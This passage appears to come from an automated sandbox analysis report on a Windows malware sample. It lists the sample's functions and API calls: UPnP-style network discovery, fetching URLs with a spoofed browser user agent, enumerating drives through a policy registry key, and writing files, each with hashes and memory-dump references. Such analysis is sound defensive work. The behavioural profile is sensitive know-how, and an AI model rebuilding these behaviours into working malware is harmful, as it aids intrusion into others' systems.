                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040DE5E
                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040DE6D
                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00408480), ref: 0040DE74
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3862671961-0
                                                                                                                                    • Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                                    • Instruction ID: 15ec6ce41066bd2df298828df26a4308ea05a03792f046612c1f6ffbd780898a
                                                                                                                                    • Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                                    • Instruction Fuzzy Hash: 1B412C74E00209DBDB04DFE4D844BAEBB71FF54315F108169E916AB381D7789A84CF99
                                                                                                                                    Function 00401D60 Relevance: 13.6, APIs: 9, Instructions: 141COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                                                                                    • setsockopt.WS2_32 ref: 00401F2C
                                                                                                                                    • closesocket.WS2_32(?), ref: 00401F39
                                                                                                                                      • Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
                                                                                                                                      • Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 671207744-0
                                                                                                                                    • Opcode ID: 8dc138b45ca20bf30cfdef2e37b67658010477f0f0075654919bb451a9b4aa4a
                                                                                                                                    • Instruction ID: f2cbb4ded8662be063e38a6044f3a63d93470e371ff4fbf655dea468244fd3f8
                                                                                                                                    • Opcode Fuzzy Hash: 8dc138b45ca20bf30cfdef2e37b67658010477f0f0075654919bb451a9b4aa4a
                                                                                                                                    • Instruction Fuzzy Hash: 4F51B075608702ABC704DF29D888B9BFBE5BF88314F40862EF85D93360D774A545CB96
                                                                                                                                    Function 0040E310 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60sleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040E36E
                                                                                                                                    • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
                                                                                                                                    • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
                                                                                                                                    • StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleeprecvfrom
                                                                                                                                    • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                                                                    • API String ID: 668330359-3973262388
                                                                                                                                    • Opcode ID: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
                                                                                                                                    • Instruction ID: e67ba9521a541be798431772fb319970cc3d6429c6b3b7a9c3ce28b53cac335a
                                                                                                                                    • Opcode Fuzzy Hash: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
                                                                                                                                    • Instruction Fuzzy Hash: 5E2130B0940218ABDB20CB65DC45BE9BB74AB04308F1085E9EB19B72C0D7B95AD6CF5D
                                                                                                                                    Function 0040F4B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57networksleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040F4C7
                                                                                                                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F4E6
                                                                                                                                    • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040F50F
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040F538
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040F542
                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040F54D
                                                                                                                                    Strings
                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040F4C2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                    • API String ID: 2743515581-2960703779
                                                                                                                                    • Opcode ID: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
                                                                                                                                    • Instruction ID: af5d65e8d2fa993cc87ce820da5284d466d7432e490674ab1d3698c460306143
                                                                                                                                    • Opcode Fuzzy Hash: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
                                                                                                                                    • Instruction Fuzzy Hash: E7212975A40308BBDB20DF94CC49FEEB7B5AB04705F1084A5EA11AB2C0C7B9AA84CB55
                                                                                                                                    Function 0040BC70 Relevance: 12.1, APIs: 8, Instructions: 107fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InitializeCriticalSection.KERNEL32(004165F8,?,?,?,?,?,?,00408403), ref: 0040BC7B
                                                                                                                                    • CreateFileW.KERNEL32(004163E0,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040BCCD
                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040BCEE
                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040BD0D
                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040BD22
                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040BD88
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040BD92
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040BD9C
                                                                                                                                      • Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
                                                                                                                                      • Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 439099756-0
                                                                                                                                    • Opcode ID: 95b7ad4b48b2612a2ac74941d1961fd8d23959eee21eec156b7f746c57c5f411
                                                                                                                                    • Instruction ID: 789285c27e92e60cc42243599a26330008c438e37824d2da8ff51af530b364ad
                                                                                                                                    • Opcode Fuzzy Hash: 95b7ad4b48b2612a2ac74941d1961fd8d23959eee21eec156b7f746c57c5f411
                                                                                                                                    • Instruction Fuzzy Hash: 0F413A74E40309EBDB10EBA4DC4ABAEB774EB44705F20856AF6117A2C1C7B96941CB9C
                                                                                                                                    Function 00405C00 Relevance: 12.1, APIs: 8, Instructions: 97fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InitializeCriticalSection.KERNEL32(00415B88,?,?,?,?,?,004083CD), ref: 00405C0B
                                                                                                                                    • CreateFileW.KERNEL32(00415FC8,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,004083CD), ref: 00405C25
                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C46
                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C65
                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C7E
                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00405D0B
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405D15
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00405D1F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3956458805-0
                                                                                                                                    • Opcode ID: d5d83b1f14bbe53c7a306cab709472362fb8432e959898be764c548cb6fd93a9
                                                                                                                                    • Instruction ID: 999418e1eeb904d95552c7fd1475d0c30f1e1fd8627807f9f1e65d0b0efdc9c4
                                                                                                                                    • Opcode Fuzzy Hash: d5d83b1f14bbe53c7a306cab709472362fb8432e959898be764c548cb6fd93a9
                                                                                                                                    • Instruction Fuzzy Hash: DE310E74E40209EBDB14DBA4DC49FAFB774EB48700F20856AE6017B2C0D7B96941CF99
                                                                                                                                    Function 004060A0 Relevance: 10.7, APIs: 7, Instructions: 176fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(00415B88,00000000,0040C2A2,006A0266,?,0040C2BE,00000000,0040D66C,?), ref: 004060AF
                                                                                                                                    • memcpy.NTDLL(?,00000000,00000100), ref: 00406141
                                                                                                                                    • CreateFileW.KERNEL32(00415FC8,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406265
                                                                                                                                    • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004062C7
                                                                                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 004062D3
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 004062DD
                                                                                                                                    • LeaveCriticalSection.KERNEL32(00415B88,?,?,?,?,?,?,0040C2BE,00000000,0040D66C,?), ref: 004062E8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1457358591-0
                                                                                                                                    • Opcode ID: e72a487dce04114ef622edc0900d7397c89588e022fce289eeb1184eb778240f
                                                                                                                                    • Instruction ID: a605c5c2860c2acc1241a09a2373603bf375adc509756cd8cb030c585388e075
                                                                                                                                    • Opcode Fuzzy Hash: e72a487dce04114ef622edc0900d7397c89588e022fce289eeb1184eb778240f
                                                                                                                                    • Instruction Fuzzy Hash: D171BCB4E042099FCB04DF94D981FEFB7B1AF88304F14816DE506AB381D779A951CBA9
                                                                                                                                    Function 0040ECC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040EDF7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                    • String ID: device$deviceType
                                                                                                                                    • API String ID: 1602765415-3511266565
                                                                                                                                    • Opcode ID: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
                                                                                                                                    • Instruction ID: 03739fb7cbf0ac8b4f24cf275543a684364e3b5b0ef8f18e7a9da7a5ef98527e
                                                                                                                                    • Opcode Fuzzy Hash: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
                                                                                                                                    • Instruction Fuzzy Hash: 1A413A75A0020ADFCB04DF99D884BAFB7B5FF48304F108969E505A7390D778AA91CB95
                                                                                                                                    Function 0040EB60 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040EC97
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                    • String ID: service$serviceType
                                                                                                                                    • API String ID: 1602765415-3667235276
                                                                                                                                    • Opcode ID: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
                                                                                                                                    • Instruction ID: 010777473a756836e58c8d4bedbd534eac8e5d19c37eb4cb5fbe46cee8795b1d
                                                                                                                                    • Opcode Fuzzy Hash: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
                                                                                                                                    • Instruction Fuzzy Hash: 9F416A74A0020ADFDB04CF99C884BAFB7B9BF48304F108969E505B7390D779AE81CB95
                                                                                                                                    Function 004022C0 Relevance: 10.6, APIs: 7, Instructions: 95COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3168844106-0
                                                                                                                                    • Opcode ID: 3ac2f8f5af7b0d3c40b8ef892d708a394eff8d7b565022b2108cc4f7acf51177
                                                                                                                                    • Instruction ID: a453b5b0d0ea6fd4c501cc83d62b7a74cd48d0bc9ee55fa6e36116878b1ddbe7
                                                                                                                                    • Opcode Fuzzy Hash: 3ac2f8f5af7b0d3c40b8ef892d708a394eff8d7b565022b2108cc4f7acf51177
                                                                                                                                    • Instruction Fuzzy Hash: D231D1722012059BC710AFB5ED8CAE7B7A8FB44314F04863EE55AD3280DB78A4449BA9
                                                                                                                                    Function 0040ED01 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040EDF7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                    • String ID: device$deviceType
                                                                                                                                    • API String ID: 1602765415-3511266565
                                                                                                                                    • Opcode ID: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
                                                                                                                                    • Instruction ID: 82367b585ef85f09a19fbcbd702cec43aacbd83c2379c0e5ae25b899a50ddae9
                                                                                                                                    • Opcode Fuzzy Hash: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
                                                                                                                                    • Instruction Fuzzy Hash: F1313970A0020ADFCB14CF99D884BEFB7B5FF88304F108969E514A7390D778AA91CB95
                                                                                                                                    Function 0040EBA1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040EC97
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                    • String ID: service$serviceType
                                                                                                                                    • API String ID: 1602765415-3667235276
                                                                                                                                    • Opcode ID: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
                                                                                                                                    • Instruction ID: b0af1682f63206834f838cc0e71cdea1734b5e967c65deefb948a4066f0743c7
                                                                                                                                    • Opcode Fuzzy Hash: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
                                                                                                                                    • Instruction Fuzzy Hash: 09312874A0420A9FDB04CF99C884BEFB7B5BF48304F108969E615B7390D779AA81CB95
                                                                                                                                    Function 004077F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71sleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                                                                                    • String ID: %s%s
                                                                                                                                    • API String ID: 1447977647-3252725368
                                                                                                                                    • Opcode ID: 0f885536a534958de828f6dadf3c238a14188cbeabebc74b6a6376721a3f9b9c
                                                                                                                                    • Instruction ID: a96cc5071c69656b1b6f4b00c6699880e4d6530ea1aa1078cf67c052952084b8
                                                                                                                                    • Opcode Fuzzy Hash: 0f885536a534958de828f6dadf3c238a14188cbeabebc74b6a6376721a3f9b9c
                                                                                                                                    • Instruction Fuzzy Hash: 643116B0C01218DFCB50DFA8DC887EDBBB4BB48304F1085AAE609B6290D7795AC4CF59
                                                                                                                                    Function 004063E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetLogicalDrives.KERNEL32 ref: 004063E6
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040647E
                                                                                                                                    Strings
                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406427
                                                                                                                                    • NoDrives, xrefs: 00406458
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                                                                    • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                                                                    • API String ID: 2666887985-3471754645
                                                                                                                                    • Opcode ID: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
                                                                                                                                    • Instruction ID: 87cba227ccd7b938b07588cb79f30f32aa16a0fd6c84a7572e83495dfcaef010
                                                                                                                                    • Opcode Fuzzy Hash: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
                                                                                                                                    • Instruction Fuzzy Hash: D311FCB0E0020A9BDB10CFD0D945BEEBBB4BB08304F118119E615B7280D7B85685CF99
                                                                                                                                    Function 0040DBE0 Relevance: 9.1, APIs: 6, Instructions: 80threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04
                                                                                                                                      • Part of subcall function 0040DCD0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040DD10
